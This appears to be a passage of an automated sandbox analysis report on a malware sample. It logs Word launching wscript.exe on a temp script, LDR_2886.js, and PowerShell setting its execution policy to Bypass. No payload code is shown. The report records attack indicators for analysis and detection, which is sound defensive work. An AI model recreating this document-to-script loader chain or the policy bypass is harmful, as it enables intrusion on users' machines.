Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (71)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 4
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (64)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 58
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #33: wscript.exe
165 0
»
Information Value
ID #33
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:02:01, Reason: Self Terminated
Monitor Duration 00:00:20
OS Process Information
»
Information Value
PID 0xb6c
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B9C
0x 7F0
0x 774
0x 5CC
0x 9CC
0x B0C
0x A04
0x 38C
0x 6FC
0x 764
Host Behavior
COM (4)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (21)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xffa90000 True 2
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 1
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 4348512 True 1
Fn
System (72)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:45 (UTC) True 1
Fn
Get Time type = Ticks, time = 173036 True 1
Fn
Get Time type = Performance Ctr, time = 22744582169 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:46 (UTC) True 3
Fn
Get Time type = Ticks, time = 173972 True 1
Fn
Get Time type = Performance Ctr, time = 22838216170 True 1
Fn
Get Time type = Ticks, time = 174175 True 2
Fn
Get Time type = Ticks, time = 174580 True 1
Fn
Get Time type = Performance Ctr, time = 22899250398 True 1
Fn
Get Time type = Ticks, time = 174596 True 1
Fn
Get Time type = Performance Ctr, time = 22900185213 True 1
Fn
Get Time type = Ticks, time = 175735 True 1
Fn
Get Time type = Ticks, time = 176015 True 2
Fn
Get Time type = Ticks, time = 178683 True 1
Fn
Get Time type = Ticks, time = 180539 True 1
Fn
Get Time type = Ticks, time = 182583 True 1
Fn
Get Time type = Ticks, time = 184439 True 1
Fn
Get Time type = Ticks, time = 184455 True 3
Fn
Get Time type = Ticks, time = 184627 True 3
Fn
Get Time type = Ticks, time = 184642 True 1
Fn
Get Time type = Ticks, time = 184658 True 2
Fn
Get Time type = Ticks, time = 184767 True 2
Fn
Get Time type = Ticks, time = 184783 True 1
Fn
Get Time type = Ticks, time = 184798 True 2
Fn
Get Time type = Ticks, time = 184954 True 2
Fn
Get Time type = Ticks, time = 184970 True 2
Fn
Get Time type = Ticks, time = 184985 True 1
Fn
Get Time type = Ticks, time = 185219 True 1
Fn
Get Time type = Ticks, time = 185235 True 2
Fn
Get Time type = Ticks, time = 185469 True 1
Fn
Get Time type = Ticks, time = 185485 True 1
Fn
Get Time type = Ticks, time = 185750 True 1
Fn
Get Time type = Ticks, time = 186077 True 5
Fn
Get Time type = Ticks, time = 186093 True 4
Fn
Get Time type = Ticks, time = 186280 True 3
Fn
Get Time type = Ticks, time = 186296 True 1
Fn
Get Time type = Ticks, time = 187809 True 1
Fn
Get Time type = Ticks, time = 187825 True 2
Fn
Get Info type = Operating System True 5
Fn
Get Info type = System Directory, result_out = ìô True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #34: wscript.exe
182 0
»
Information Value
ID #34
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:47, Reason: Child Process
Unmonitor End Time: 00:02:00, Reason: Self Terminated
Monitor Duration 00:00:12
OS Process Information
»
Information Value
PID 0x6a8
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 794
0x A34
0x 178
0x 70C
0x 4B4
0x 9C4
0x 408
0x 7C4
0x A00
0x A3C
Host Behavior
COM (5)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 32, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 32, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 32, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 32, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (27)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xffa90000 True 3
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefea62e18 True 1
Fn
Get Address c:\windows\system32\wscript.exe function = 1, address_out = 0xffa9d7f8 True 1
Fn
